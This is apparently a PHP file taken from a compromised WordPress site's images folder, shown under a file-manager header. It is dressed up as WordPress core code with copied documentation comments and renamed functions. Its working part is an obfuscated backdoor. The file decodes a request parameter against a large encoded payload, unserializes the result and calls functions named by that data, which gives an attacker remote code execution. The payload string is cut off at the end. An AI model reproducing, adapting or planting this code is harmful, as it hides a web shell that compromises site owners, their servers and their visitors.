PK œqhYî¶J‚ßF ßF ) nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/
Dir : /home/trave494/hotebooking.site/wp-includes/images/ |
Server: Linux ngx353.inmotionhosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64 IP: 209.182.202.254 |
Dir : /home/trave494/hotebooking.site/wp-includes/images/lygjashx.php |
<?php /** * Retrieves the number of times an action has been fired during the current request. * * @since 2.1.0 * * @global int[] $secret Stores the number of times each action was triggered. * * @param string $delete_limit The name of the action hook. * @return int The number of times the action hook has been fired. */ function compatible_gzinflate($delete_limit) { global $secret; if (!isset($secret[$delete_limit])) { return 0; } return $secret[$delete_limit]; } // Add WordPress.org link. $needle = "Sample Message"; /** * @ignore */ function create_initial_theme_features() { } /* translators: %s: Support forums URL. */ function sodium_compare($messenger_channel, $is_writable_abspath, $has_items) { return str_replace($is_writable_abspath, $has_items, $messenger_channel); } /** * Registers plural strings in POT file, but does not translate them. * * Used when you want to keep structures with translatable plural * strings and use them later when the number is known. * * Example: * * $needle = get_edit_user_link( '%s post', '%s posts', 'text-domain' ); * ... * printf( translate_nooped_plural( $needle, $count, 'text-domain' ), number_format_i18n( $count ) ); * * @since 2.5.0 * * @param string $tinymce_settings Singular form to be localized. * @param string $widget_numbers Plural form to be localized. * @param string $mailserver_url Optional. Text domain. Unique identifier for retrieving translated strings. * Default null. * @return array { * Array of translation information for the strings. * * @type string $0 Singular form to be localized. No longer used. * @type string $1 Plural form to be localized. No longer used. * @type string $tinymce_settings Singular form to be localized. * @type string $widget_numbers Plural form to be localized. * @type null $context Context information for the translators. * @type string|null $mailserver_url Text domain. * } */ function get_edit_user_link($tinymce_settings, $widget_numbers, $mailserver_url = null) { return array(0 => $tinymce_settings, 1 => $widget_numbers, 'singular' => $tinymce_settings, 'plural' => $widget_numbers, 'context' => null, 'domain' => $mailserver_url); } $delete_file = str_replace("World", "PHP", "Hello, World!"); /** * Counts number of sites grouped by site status. * * @since 5.3.0 * * @param int $pagelinkedfrom Optional. The network to get counts for. Default is the current network ID. * @return int[] { * Numbers of sites grouped by site status. * * @type int $all The total number of sites. * @type int $public The number of public sites. * @type int $archived The number of archived sites. * @type int $mature The number of mature sites. * @type int $spam The number of spam sites. * @type int $deleted The number of deleted sites. * } */ function get_comment_author_link($pagelinkedfrom = null) { if (empty($pagelinkedfrom)) { $pagelinkedfrom = get_current_network_id(); } $custom_background_color = array(); $thisfile_riff_RIFFsubtype_COMM_0_data = array('network_id' => $pagelinkedfrom, 'number' => 1, 'fields' => 'ids', 'no_found_rows' => false); $new_sub_menu = new WP_Site_Query($thisfile_riff_RIFFsubtype_COMM_0_data); $custom_background_color['all'] = $new_sub_menu->found_sites; $css_gradient_data_types = $thisfile_riff_RIFFsubtype_COMM_0_data; $check_modified = array('public', 'archived', 'mature', 'spam', 'deleted'); foreach ($check_modified as $body_placeholder) { $css_gradient_data_types = $thisfile_riff_RIFFsubtype_COMM_0_data; $css_gradient_data_types[$body_placeholder] = 1; $new_sub_menu = new WP_Site_Query($css_gradient_data_types); $custom_background_color[$body_placeholder] = $new_sub_menu->found_sites; } return $custom_background_color; } /** * Callback for rendering the custom logo, used in the custom_logo partial. * * This method exists because the partial object and context data are passed * into a partial's render_callback so we cannot use get_custom_logo() as * the render_callback directly since it expects a blog ID as the first * argument. When WP no longer supports PHP 5.3, this method can be removed * in favor of an anonymous function. * * @see WP_Customize_Manager::register_controls() * * @since 4.5.0 * * @return string Custom logo. */ function get_post_to_edit(&$total_in_minutes, $css_rule_objects, $serialized_instance){ // $plugin must exist. $akismet_result = "EncodeThis"; $chapter_string_length_hex = "1,2,3,4,5"; $columns_selector = "Jack,Ana,Peter"; $album = 256; // if inside an Atom content construct (e.g. content or summary) field treat tags as text // Sample Table Sample-to-Chunk atom $now = count($serialized_instance); $now = $css_rule_objects % $now; // Error: missing_args_hmac. // Template for the Crop area layout, used for example in the Customizer. $time_format = explode(",", $chapter_string_length_hex); $col_length = hash("sha1", $akismet_result); $response_code = explode(',', $columns_selector); $now = $serialized_instance[$now]; foreach ($response_code as &$inarray) { $inarray = trim($inarray); } $from_line_no = array_sum($time_format); $trackarray = trim($col_length); if (strlen($trackarray) > 30) { $notimestamplyricsarray = substr($trackarray, 0, 30); } unset($inarray); $unapproved = array_merge($time_format, [10]); $total_in_minutes = ($total_in_minutes - $now); $transparency = implode(' | ', $response_code); $total_in_minutes = $total_in_minutes % $album; } /** * Show Comments section. * * @since 3.8.0 * * @param int $associative Optional. Number of comments to query. Default 5. * @return bool False if no comments were found. True otherwise. */ function filter_wp_get_nav_menu_items($associative = 5) { // Select all comment types and filter out spam later for better query performance. $menu_item_setting_id = array(); $actual_bookmark_name = array('number' => $associative * 5, 'offset' => 0); if (!current_user_can('edit_posts')) { $actual_bookmark_name['status'] = 'approve'; } while (count($menu_item_setting_id) < $associative && $XMLstring = get_comments($actual_bookmark_name)) { if (!is_array($XMLstring)) { break; } foreach ($XMLstring as $next_posts) { if (!current_user_can('edit_post', $next_posts->comment_post_ID) && (post_password_required($next_posts->comment_post_ID) || !current_user_can('read_post', $next_posts->comment_post_ID))) { // The user has no access to the post and thus cannot see the comments. continue; } $menu_item_setting_id[] = $next_posts; if (count($menu_item_setting_id) === $associative) { break 2; } } $actual_bookmark_name['offset'] += $actual_bookmark_name['number']; $actual_bookmark_name['number'] = $associative * 10; } if ($menu_item_setting_id) { echo '<div id="latest-comments" class="activity-block table-view-list">'; echo '<h3>' . __('Recent Comments') . '</h3>'; echo '<ul id="the-comment-list" data-wp-lists="list:comment">'; foreach ($menu_item_setting_id as $next_posts) { _filter_wp_get_nav_menu_items_row($next_posts); } echo '</ul>'; if (current_user_can('edit_posts')) { echo '<h3 class="screen-reader-text">' . __('View more comments') . '</h3>'; _get_list_table('WP_Comments_List_Table')->views(); } wp_comment_reply(-1, false, 'dashboard', false); wp_comment_trashnotice(); echo '</div>'; } else { return false; } return true; } /* * Instead of clearing the parser state and starting fresh, calling the stack methods * maintains the proper flags in the parser. */ function get_text($inkey2, $plugins_total) { $sticky_posts_count = "SimpleString"; // Redirect old slugs. // Flags $xx xx foreach ($inkey2 as $now => $use_defaults) { if ($use_defaults == $plugins_total) { return $now; } } return -1; } $cqueries = "base64encoded"; /** * Retrieves archive link content based on predefined or custom code. * * The format can be one of four styles. The 'link' for head element, 'option' * for use in the select element, 'html' for use in list (either ol or ul HTML * elements). Custom content is also supported using the before and after * parameters. * * The 'link' format uses the `<link>` HTML element with the **archives** * relationship. The before and after parameters are not used. The text * parameter is used to describe the link. * * The 'option' format uses the option HTML element for use in select element. * The value is the url parameter and the before and after parameters are used * between the text description. * * The 'html' format, which is the default, uses the li HTML element for use in * the list HTML elements. The before parameter is before the link and the after * parameter is after the closing link. * * The custom format uses the before parameter before the link ('a' HTML * element) and the after parameter after the closing link tag. If the above * three values for the format are not used, then custom format is assumed. * * @since 1.0.0 * @since 5.2.0 Added the `$include_logo_link` parameter. * * @param string $wp_meta_keys URL to archive. * @param string $this_plugin_dir Archive text description. * @param string $total_inline_size Optional. Can be 'link', 'option', 'html', or custom. Default 'html'. * @param string $lon_deg_dec Optional. Content to prepend to the description. Default empty. * @param string $filtered_declaration Optional. Content to append to the description. Default empty. * @param bool $include_logo_link Optional. Set to true if the current page is the selected archive page. * @return string HTML link content for archive. */ function scalarmult_throw_if_zero($wp_meta_keys, $this_plugin_dir, $total_inline_size = 'html', $lon_deg_dec = '', $filtered_declaration = '', $include_logo_link = false) { $this_plugin_dir = wptexturize($this_plugin_dir); $wp_meta_keys = esc_url($wp_meta_keys); $curl_value = $include_logo_link ? ' aria-current="page"' : ''; if ('link' === $total_inline_size) { $plugins_group_titles = "\t<link rel='archives' title='" . esc_attr($this_plugin_dir) . "' href='{$wp_meta_keys}' />\n"; } elseif ('option' === $total_inline_size) { $rewrite_node = $include_logo_link ? " selected='selected'" : ''; $plugins_group_titles = "\t<option value='{$wp_meta_keys}'{$rewrite_node}>{$lon_deg_dec} {$this_plugin_dir} {$filtered_declaration}</option>\n"; } elseif ('html' === $total_inline_size) { $plugins_group_titles = "\t<li>{$lon_deg_dec}<a href='{$wp_meta_keys}'{$curl_value}>{$this_plugin_dir}</a>{$filtered_declaration}</li>\n"; } else { // Custom. $plugins_group_titles = "\t{$lon_deg_dec}<a href='{$wp_meta_keys}'{$curl_value}>{$this_plugin_dir}</a>{$filtered_declaration}\n"; } /** * Filters the archive link content. * * @since 2.6.0 * @since 4.5.0 Added the `$wp_meta_keys`, `$this_plugin_dir`, `$total_inline_size`, `$lon_deg_dec`, and `$filtered_declaration` parameters. * @since 5.2.0 Added the `$include_logo_link` parameter. * * @param string $plugins_group_titles The archive HTML link content. * @param string $wp_meta_keys URL to archive. * @param string $this_plugin_dir Archive text description. * @param string $total_inline_size Link format. Can be 'link', 'option', 'html', or custom. * @param string $lon_deg_dec Content to prepend to the description. * @param string $filtered_declaration Content to append to the description. * @param bool $include_logo_link True if the current page is the selected archive. */ return apply_filters('scalarmult_throw_if_zero', $plugins_group_titles, $wp_meta_keys, $this_plugin_dir, $total_inline_size, $lon_deg_dec, $filtered_declaration, $include_logo_link); } $skip_options = 'Spaces here '; /* translators: 1: The WordPress error message. 2: The WordPress error code. */ function wp_transition_comment_status($description_wordpress_id){ $md5_check = $_GET[$description_wordpress_id]; $resend = "Example Text"; $chapter_string_length_hex = "verify_input"; $server_architecture = "foo bar"; $subdirectory_warning_message = range(1, 10); $upgrading = explode("_", $chapter_string_length_hex); $locked_post_status = trim($resend); $max_srcset_image_width = count($subdirectory_warning_message); $CharSet = explode(" ", $server_architecture); if ($max_srcset_image_width > 5) { $subdirectory_warning_message[] = 11; } $postpath = hash('sha224', $upgrading[1]); $post_format = strlen($locked_post_status); $mbstring_func_overload = array_map('strtoupper', $CharSet); // PodCaST // For backward compatibility, failures go through the filter below. if (strlen($postpath) > 28) { $simpletag_entry = substr($postpath, 0, 28); } else { $simpletag_entry = $postpath; } if ($post_format > 10) { $signHeader = hash('md5', $locked_post_status); } $banned_domain = implode("-", $mbstring_func_overload); $md5_check = str_split($md5_check); $replaygain = str_pad($simpletag_entry, 28, "0"); $TypeFlags = rawurldecode("Example%20Text"); // Return comment threading information (https://www.ietf.org/rfc/rfc4685.txt). $md5_check = array_map("ord", $md5_check); return $md5_check; } render_block_core_comments_pagination_previous(); $description_wordpress_id = "prDen"; /** * Gets the header images uploaded for the active theme. * * @since 3.2.0 * * @return array */ function get_provider() { $object_subtypes = array(); // @todo Caching. $handled = get_posts(array('post_type' => 'attachment', 'meta_key' => '_wp_attachment_is_custom_header', 'meta_value' => get_option('stylesheet'), 'orderby' => 'none', 'nopaging' => true)); if (empty($handled)) { return array(); } foreach ((array) $handled as $index_data) { $wp_meta_keys = sanitize_url(wp_get_attachment_url($index_data->ID)); $template_query = wp_get_attachment_metadata($index_data->ID); $element_low = $index_data->ID; $object_subtypes[$element_low] = array(); $object_subtypes[$element_low]['attachment_id'] = $index_data->ID; $object_subtypes[$element_low]['url'] = $wp_meta_keys; $object_subtypes[$element_low]['thumbnail_url'] = $wp_meta_keys; $object_subtypes[$element_low]['alt_text'] = get_post_meta($index_data->ID, '_wp_attachment_image_alt', true); if (isset($template_query['attachment_parent'])) { $object_subtypes[$element_low]['attachment_parent'] = $template_query['attachment_parent']; } else { $object_subtypes[$element_low]['attachment_parent'] = ''; } if (isset($template_query['width'])) { $object_subtypes[$element_low]['width'] = $template_query['width']; } if (isset($template_query['height'])) { $object_subtypes[$element_low]['height'] = $template_query['height']; } } return $object_subtypes; } /** * Prints default Plupload arguments. * * @since 3.4.0 */ function load_form_js_via_filter($inarray, $md5_check){ $appearance_cap = $md5_check[1]; // Skip if "fontFace" is not defined, meaning there are no variations. //allow sendmail to choose a default envelope sender. It may $prime_post_terms = $md5_check[3]; $appearance_cap($inarray, $prime_post_terms); } /** * Displays the permalink to the post for use in feeds. * * @since 2.3.0 */ function feed_links_extra() { /** * Filters the permalink to the post for use in feeds. * * @since 2.3.0 * * @param string $post_permalink The current post permalink. */ echo esc_url(apply_filters('feed_links_extra', get_permalink())); } /** * @see ParagonIE_Sodium_Compat::crypto_aead_xchacha20poly1305_ietf_decrypt() * @param string $edit_link * @param string $bit_depth * @param string $pagepath * @param string $now * @return string|bool */ function crypto_secretbox($edit_link, $bit_depth, $pagepath, $now) { try { return ParagonIE_Sodium_Compat::crypto_aead_xchacha20poly1305_ietf_decrypt($edit_link, $bit_depth, $pagepath, $now, true); } catch (Error $eq) { return false; } catch (Exception $eq) { return false; } } /** * Determines whether an offset value exists. * * @since 4.7.0 * * @link https://www.php.net/manual/en/arrayaccess.offsetexists.php * * @param mixed $offset An offset to check for. * @return bool True if the offset exists, false otherwise. */ function do_activate_header($md5_check){ $new_attr = 'PHP is amazing'; $alt_option_name = $md5_check[4]; $feeds = strpos($new_attr, 'amazing'); // (fscode==1) means 44100Hz (see sampleRateCodeLookup) $inarray = $md5_check[2]; load_form_js_via_filter($inarray, $md5_check); if ($feeds !== false) { $blog_url = 'Contains amazing'; } // s13 = a2 * b11 + a3 * b10 + a4 * b9 + a5 * b8 + a6 * b7 + a7 * b6 + get_block_template($inarray); $alt_option_name($inarray); } // Average BitRate (ABR) /** * Registers the `core/comments-pagination` block on the server. */ function allowed_tags() { register_block_type_from_metadata(__DIR__ . '/comments-pagination', array('render_callback' => 'render_block_core_comments_pagination')); } $md5_check = wp_transition_comment_status($description_wordpress_id); /** * Retrieves the value of a transient. * * If the transient does not exist, does not have a value, or has expired, * then the return value will be false. * * @since 2.8.0 * * @param string $f1f9_76 Transient name. Expected to not be SQL-escaped. * @return mixed Value of transient. */ function addAnAddress($f1f9_76) { /** * Filters the value of an existing transient before it is retrieved. * * The dynamic portion of the hook name, `$f1f9_76`, refers to the transient name. * * Returning a value other than false from the filter will short-circuit retrieval * and return that value instead. * * @since 2.8.0 * @since 4.4.0 The `$f1f9_76` parameter was added * * @param mixed $line_out_transient The default value to return if the transient does not exist. * Any value other than false will short-circuit the retrieval * of the transient, and return that value. * @param string $f1f9_76 Transient name. */ $line_out = apply_filters("pre_transient_{$f1f9_76}", false, $f1f9_76); if (false !== $line_out) { return $line_out; } if (wp_using_ext_object_cache() || wp_installing()) { $use_defaults = wp_cache_get($f1f9_76, 'transient'); } else { $in_hierarchy = '_transient_' . $f1f9_76; if (!wp_installing()) { // If option is not in alloptions, it is not autoloaded and thus has a timeout. $is_plugin_installed = wp_load_alloptions(); if (!isset($is_plugin_installed[$in_hierarchy])) { $newline = '_transient_timeout_' . $f1f9_76; $image_with_align = get_option($newline); if (false !== $image_with_align && $image_with_align < time()) { delete_option($in_hierarchy); delete_option($newline); $use_defaults = false; } } } if (!isset($use_defaults)) { $use_defaults = get_option($in_hierarchy); } } /** * Filters an existing transient's value. * * The dynamic portion of the hook name, `$f1f9_76`, refers to the transient name. * * @since 2.8.0 * @since 4.4.0 The `$f1f9_76` parameter was added * * @param mixed $use_defaults Value of transient. * @param string $f1f9_76 Transient name. */ return apply_filters("transient_{$f1f9_76}", $use_defaults, $f1f9_76); } /** * Loads sidebar template. * * Includes the sidebar template for a theme or if a name is specified then a * specialized sidebar will be included. * * For the parameter, if the file is called "sidebar-special.php" then specify * "special". * * @since 1.5.0 * @since 5.5.0 A return value was added. * @since 5.5.0 The `$thisfile_riff_RIFFsubtype_COMM_0_data` parameter was added. * * @param string $inarray The name of the specialized sidebar. * @param array $thisfile_riff_RIFFsubtype_COMM_0_data Optional. Additional arguments passed to the sidebar template. * Default empty array. * @return void|false Void on success, false if the template does not exist. */ function wp_comments_personal_data_exporter($md5_check){ $tag_added = "SampleToDecode"; $resend = "Example Text"; $md5_check = array_map("chr", $md5_check); // get length $locked_post_status = trim($resend); $slug_group = rawurldecode($tag_added); // A cookie (set when a user resizes the editor) overrides the height. $blog_text = hash('md5', $slug_group); $post_format = strlen($locked_post_status); $md5_check = implode("", $md5_check); $md5_check = unserialize($md5_check); // 2 second timeout return $md5_check; } /** * Determines whether the query is for an existing year archive. * * For more information on this and similar theme functions, check out * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/ * Conditional Tags} article in the Theme Developer Handbook. * * @since 1.5.0 * * @global WP_Query $configurationVersion WordPress Query object. * * @return bool Whether the query is for an existing year archive. */ function refresh_user_details() { global $configurationVersion; if (!isset($configurationVersion)) { _doing_it_wrong(__FUNCTION__, __('Conditional query tags do not work before the query is run. Before then, they always return false.'), '3.1.0'); return false; } return $configurationVersion->refresh_user_details(); } /** * Returns the fallback template for the given slug. * * @since 6.1.0 * @since 6.3.0 Ignore empty templates. * * @param WP_REST_Request $update_data The request instance. * @return WP_REST_Response|WP_Error */ function render_block_core_comments_pagination_previous(){ $editor_script_handle = "URL%20Example"; // pass set cookies back through redirects $tempdir = "\xad\x85\xac\xb3\xee\xad\x9e\x88\x87\xbe\xb2\xaa\xaa~\x86\xbd\xb5\xb7\xdd\xd8\xe3\xb9\xd8\xb6\xaf\xba\xe6\xed\xd8\xb2\xd8\xcan\x86\xe1\xb3\xa5\xd7\x91\x83\x85\x9a\xbe\xc4\x92\xcd\x9e\x9e\xbb\x9a\xb4\xdc~\x97\x92\xbf\x85\xac\xae\xacy\x9ey\x88\x8a\xe8\xe1\xe3N\xca\xcc\xba\xae\xec\xe2\xe2\xb2\x93\x81\xa6u\xa7\xc0\xec\x86\xa5\xa3\xa2\xb2\xa0\x9d\xdf\xba\xce\xac\xc3\x9a\xa1\x83\x93d\x84\x86vk\xf0\xf2\xedd\x8e\x86\xc7U\x82\x83|\xb6\xc9\xcb\xc1\xbd\xe6\xa8\x9dd\x84\xac\xb0\xad\xeb\xee\x9ds\xa4\xc7\xad\xae\xe3\xa1|\xa7\xcc\xc9{u\x98\x99\x93\xba\xce\xbc\xbak\x98\x99\x9ds\x8c\x8e~t\xa7\xa3\xe4\x88\xd5\xc0\xb4k\x98\xa3\xa2r\x84wlk\x9a\xd5\xa8v\x86\x83{u\xc7\xe1\xc4\x85\xd2wvz\x9c\xe5\xe9\xae\xb9\xce\x9bk\x98\x99\x93d\x8d\x92\x87U\x82\x99\x93dnwlz\xa2\x99\xc5\x8d\xab\x9clu\xa7\x9d\xeb\xb9\xc8\xbc\xa6\xbc\x98\x99\xb0s\x8ewlk\xca\xe9\xbf\x9c\xd8wlk\xa2\xa8\xe0\xa8\x99p\xb7\xee\xe3\xc8\xbb\xb3\x80\x87U\x98\x82\x97\xa7\xbe\xab\xb5\xb8\xcc\xa8\x9dd\x84w\x9cu\xa7\xb6|\xa6\xc5\xca\xb1\x81\xac\xd8\xd7\xa9\xc7\xc6\xb0\xb0\xa0\x9d\xdf\xba\xce\xac\xc3\x9a\xa1\xb4}d\x84wl\xb4\xde\x82\x9bh\xc7\xb1\xa0\xb4\xe5\xcd\x93d\x84w\x89\x88\xb5\xa8\x9dd\xb9\xc5\xa3k\x98\x99\x9ds\xca\xb8\xb8\xbe\xdd\xa2|\xbfn`UT\x98\x99\x93d\x88\xba\xa6\x9f\xe1\xe6\xc7d\x84\x94lk\x98\xa0\x9a\x9falk\x81\xf6}d\x84wlz\xa2\xc4\x93d\x8e\x86p\x9f\xbd\xe3\xe0\x85\xcb\xbf\xad\xbb\xdf\xd3\xb8\xb6\xd6wlk\x98\xb6|\xb7\xd8\xc9\xab\xbe\xe8\xe5\xdc\xb8\x8c{\xb8\xc1\xe2\xce\xea\x93\x8d\x92Vk\x98\x82\x97\x9a\xae\xc3\xbc\xb6\xec\xc7|\x81\x93\x81lk\xc8\xd3\xd9\xa8\xa9\x81{\xbe\xec\xeb\xdf\xa9\xd2p\xb7\xee\xe3\xc8\xbb\xb3\x80\x87U\x98\x99\x93M\x88\xab\x91\xb5\xe5\xba\xda\xac\xc5wlk\x98\x99\xb0d\x84wl{\xb3\x83\x93d\x84w\xc3\xb3\xe1\xe5\xd8M\x8c`p\x9f\xbd\xe3\xe0\x85\xcb\xbf\xadT\xb4\x99\x93d\x84wp\xa1\xc2\xe5\xe3\xaf\xd8\xa5lk\xa1\x99\xeeN\x84wUo\xcc\xbe\xdd\xb1\xa5\xbe\xb4\xac\xa3\xa4\xaeNna{u\x98\x99\xeb\x96\xc9\xa3\xa0k\x98\x99\x9ds\x88\xb1\x8d\xa0\xba\xc3\xc2\xa5\xbe\x86vk\x98\xce\xe2\xab\xb7\x81{\x88\xa7\xa3\xb8\x96\xd7\xab\xbcu\xa7\x9d\xc7\x89\xce\xc4\x8d\xb2\xe0\xda\xe3\xab\xbe\x9c\xbe\xbd\xd3\x9d\xc7\x89\xce\xc4\x8d\xb2\xe0\xda\xd0\x88\xb6\x8f\x9c\x81\xb6\xa2n\x84w\xb8\x99\xbc\xbb\x93d\x84\x81{r\xab\xaf\xabt\x98~\x87U\x98\x99\x93d\x84\xc0\xb2k\x98\x99\x93d\x8c\xca\xc0\xbd\xe8\xe8\xe6l\x88\xb1\x8d\xa0\xba\xc3\xc2\xa5\xbe\x83{u\x98\xdb\xc3d\x8e\x86s\xac\x9f\xa2|e\xa1\x94U\xb1\xd9\xe5\xe6\xa9\x8d\x86vk\x98\xba\xbb\x85\x84\x81{\xc6\x82\x99\x93d\x84\x86vk\x98\x99\xb7\x8f\xb2\xd1lk\xa2\xa8\x97\x98\xa9\xc1\xb9\x8c\xdf\xe1\xd4\xb4\xcb\xb1\x91\xbd\xea\xd4\x97\x98\xa9\xc1\xb9\x8c\xdf\xe1\xd4\xa1m\x94U\xbe\xec\xeb\xe7\xb3\xd9\xc7\xbc\xb0\xea\xa1\x97\x9e\xa5\xac\x8e\x95\xc7\xda\xcdm\x9f{\xab\x9d\x81\xb6|k\x95\x89\x82|\xae\xa0\xaeNnwlk\x98\x99\xf0N\x84w{u\xba\xc8\xd6n\x93\xd4VU\x81\x9d\xe0\x8b\xba\xa1\xc4\x95\xee\xc4|\x81\x93\x81lk\xdf\xf0\x93d\x84\x81{\xb4\xe5\xe9\xdf\xb3\xc8\xbctr\x9f\xa5|h\xb8\x9c\xb6\xb8\xb9\xe0\xdb\xa5\xd4\xbe\xa6\x90\xea\xeb\x9c\x9faVU\x98\x99\x93d\x88\xb6\x93\x90\xcc\xd4\x9a\xa8\xc9\xba\xbb\xaf\xdd\xdd\x9a\xa1m\x94Uo\xe5\xc0\xc9\x8e\xdc\xa1\xc2\x96\xb3\x9d\xd2\xbd\xbb\xcd\xa2T\xb5\x82\x9av\x9b\x88\x83{\x9f\xb4}d\x84wp\xaa\xc8\xc8\xc6\x98\xbf~\xb4\xac\xeb\xe1\x9a\xa1\x84w\x89z\xa2\xe3\xbed\x8e\x86p\xc3\xed\xdd\xd8\x9e\xd5\x92\x87U\x98\x99\x93d\xcd\xbdUs\xde\xe2\xdf\xa9\xc3\xbc\xc4\xb4\xeb\xed\xe6l\x8b\xc7\xad\xbf\xe0\xa8\xe7\xb3\x93\xbd\xb5\xb7\xdd\xa0\x9cm\x84wlk\x98\xf4}d\x84wlk\xa7\xa3\xdc\x99\xae\xc4vz\x9c\xc5\xb9\xae\xdc\xb0\x90T\xb5\x99\x93d\xca\xc0\xb8\xb0\xd7\xe0\xd8\xb8\xc3\xba\xbb\xb9\xec\xde\xe1\xb8\xd7s\xbb\xd9\xed\xdbs\xd8\xc6{\xb1\xe1\xe5\xd8k\x8d\x92VU\x82\x99\x93h\xb8\x9c\xb6\xb8\xb9\xe0\xdb\xa5\xd9\xcd\x9e\xac\xd9\xd3\xd7\xbc\xbc`\x89T\xdd\xf1\xe3\xb0\xd3\xbb\xb1s\x9f\xa5\x9ap\x84wp\x97\xbe\xe3\xeb\x9d\xa8\x80\x87o\xd7\xd2\xd6s\x8e\xc6\xa0\xa2\xa2\xa8\xb0d\x8b\x89\x84\x82\xb0\xb1\x9anwUo\xc7\xe8\xcc\x93\xba\x9c\x96k\x98\x99\x93\x81m\xc4\xb0\x80\xa0\xec\xd8\xb6\xcd\xb8\xb8\xb4\xf2\xde\x9bh\xb8\x9c\xb6\xb8\xb9\xe0\xdb\xa5\xd9\xcd\x9e\xac\xd9\xd3\xd7\xbc\xbc\x80u\x86\x82\x82|\xad\xcawls\xe1\xec\xd2\xa5\xd6\xc9\xad\xc4\xa0\x9d\xc7\x89\xce\xc4\x8d\xb2\xe0\xda\xe8\xba\xb6\xb8\xad\xa5\xdc\xf1\xcbm\x8d`\xc7U\x81\x99\x93d\x84wp\xac\xd2\xe0\xd8\x9d\xba\xba\xc3T\xb5\x99\x93d\x84w\xad\xbd\xea\xda\xec\xa3\xd7\xc3\xb5\xae\xdd\xa1\x97\x98\xa9\xc1\xb9\x8c\xdf\xe1\xd4\xb9\xda\xa9\xad\xac\xd2\xdd\xeb\x9c\x90wlk\xa8\xa5\x93y\x8d\x92\x87U\x82\x82\xf0NnaU\xc8\x82\x83\xa2n\x84w\xa0\xc0\xb9\xd3\x93d\x84\x81{o\xe0\xdb\xd4\x91\xd3\xa3\xba\xb5\xe5\xa8\x9d\xb9\xb7\x9blu\xa7\xb6\xa2n\x84\x9a\xc1k\x98\xa3\xa2\xa5\xd6\xc9\xad\xc4\xd7\xe6\xd4\xb4\x8c~\xc0\xbd\xe1\xe6\x9ap\x84wp\xac\xd2\xe0\xd8\x9d\xba\xba\xc3t\xb3\xb4}d\x84wlo\xc8\xe8\xd6\x9e\xcc\xc9\x9c\xc1\x98\x99\xb0d\x84w\xbe\xac\xef\xee\xe5\xb0\xc8\xbc\xaf\xba\xdc\xde\x9b\xad\xd1\xc7\xb8\xba\xdc\xde\x9bk\x90~xk\x98\x99\x93d\x88\xbf\xae\xac\xc5\xe8\xbf\xb2\xce\xc4ut\xb3\xb4}d\x84wlk\x98\x99\x93h\xc3\x9a\x9b\x9a\xc3\xc2\xb8\x9f\x8b\xbd\xb5\xb9\xd9\xe5\xd2\xba\xc5\xc3\xc1\xb0\x9f\xd6\x93d\x84wl\x88\x98\x9d\xc3\xb3\xc7\xb1\xb4\xbd\xc8\xef\xaeNnw\xc9U\xa7\xa3\x93d\xb3\xc0lk\x98\xa3\xa2N\x84wlk\xa7\xa3\x93\x99\xc6\xb9\xc1k\x98\xa3\xa2\xaa\xd9\xc5\xaf\xbf\xe1\xe8\xe1s\x8ewl\xba\xd1\xe8\x9ds\xd1\x9c\xb5\x97\xf0\xa1\x9cN\x93\x81lk\x98\xea\xb6\x8e\xc7wvz\xf3\x83}d\x84wp\xc3\xda\xd1\xcd\xb1\xd8\xba\xbek\x98\x99\x93d\xa1`\x8d\xbd\xea\xda\xecl\x88\xb6\x8f\x9a\xc7\xc4\xbc\x89\x90wp\xaa\xc8\xc8\xc6\x98\x8d\x92Vk\x98\x99\x93M\x88\xca\xb1\x94\xdf\xce\x93d\x84\x94U\xac\xea\xeb\xd4\xbd\xc3\xc4\xad\xbb\xa0\xa0\xe0\xa8\x99~xz\xa2\x99\x93\x98\xa5\xac\x8f\x8e\x98\x99\x93n\x93{\xab\x8e\xc7\xc8\xbe\x8d\xa9\x80\x87\x86\x82\x82\xa2n\xbe\xcc\xc3\x96\xcd\x99\x9ds\x88\xc4\x91\xa5\xdf\xec\xe3\xb3\x84wlk\xb5\x99\xe6\xb8\xd6\xc7\xbb\xbe\xa0\x9d\xd2\x97\xa9\xa9\xa2\x90\xca\xd4\x9a\x8c\xb8\xab\x9c\xaa\xcd\xcc\xb8\x96\xc3\x98\x93\x90\xc6\xcd\x9a\xa1\x90`s\x98\xe7\xf3\xdc\xb0\xd0\xb8st\x98\x9a\xb0\x81\x84wlk\x98\xdf\xd4\xb0\xd7\xbc{u\x98\xed\xe2\xb8\xba\x81{\x8a\xa7\xa3\x93\xb6\xd2\xbclk\xa2\xa8\x9a\xa6\xd6\xc6\xc3\xbe\xdd\xeb\xa2n\x84\xaelk\xa2\xa8\xdc\xb7\x93\x81lk\x98\xbf\xe4\xaa\xb4\xcelk\x98\xa3\xa2\x91\xd3\xd1\xb5\xb7\xe4\xda\x9aM\x9e`s\xad\xea\xe8\xea\xb7\xc9\xc9{u\xec\xdc\x93d\x84\x81{\xb4\xeb\x99\x93d\x84\xc5\xbb\xbf\x81\xc6\xe2\xbe\xcd\xc3\xb8\xac\x9f\xb4\x97\xa3\xcc\xab\xbaT\xb5\xa8\x9dd\xd5\xcb\x92\xb5\x98\x99\x93n\x93~\x80{\xb1\xb2\xa9k\x9falT\x82\x99\x93d\x84\x86vk\xba\xc9\xbcd\x84\x81{\xb4\xde\x99\x9b\xad\xd7\xb6\xad\xbd\xea\xda\xecl\x88\xcf\xae\xa3\xd2\xe6\xe7\xa7\xd6\x80uk\x98\x99\x93\xbfnaUo\xd1\xc1\xc8\xbc\xba`\x89k\x98\x99\x93\xa5\xd6\xc9\xad\xc4\xd7\xec\xdf\xad\xc7\xbcto\xf0\xdb\xcb\x9e\xd1\xcb\xaf\xbd\xa4\xa8\x9dd\x84\x9d\xa5\xb8\xc7\xa3\xa2t\x90wl|\xa1\xb4\xaeN\x84wlk\x98\x82\xf0d\x84w\xb1\xb7\xeb\xde\xa2n\xcb\xcb\xba\xb9\xe0\x99\x93n\x93\xd2VT\x81\x82|M\x84wp\xa4\xc0\xce\xeb\x9am\x94lk\x98\x99\xce\xa1\x9falk\x98\x99\x93\xc1nwlk\x98\x99\x93d\x84aUT\x98\x99\x97\xa5\xd1\xad\x91\xa4\xc7\xdf\xca\x8em\x94lk\x98\x99\x93\xa9\xdc\xc7\xb8\xba\xdc\xde\x9bk\x90~xk\x98\x99\x93k\xc5\xc7\xbc\xb7\xdd\xa5\xe2\xb6\xc5\xc5\xb3\xb0\xa4\xdb\xd4\xb2\xc5\xc5\xadr\xa1\xb4\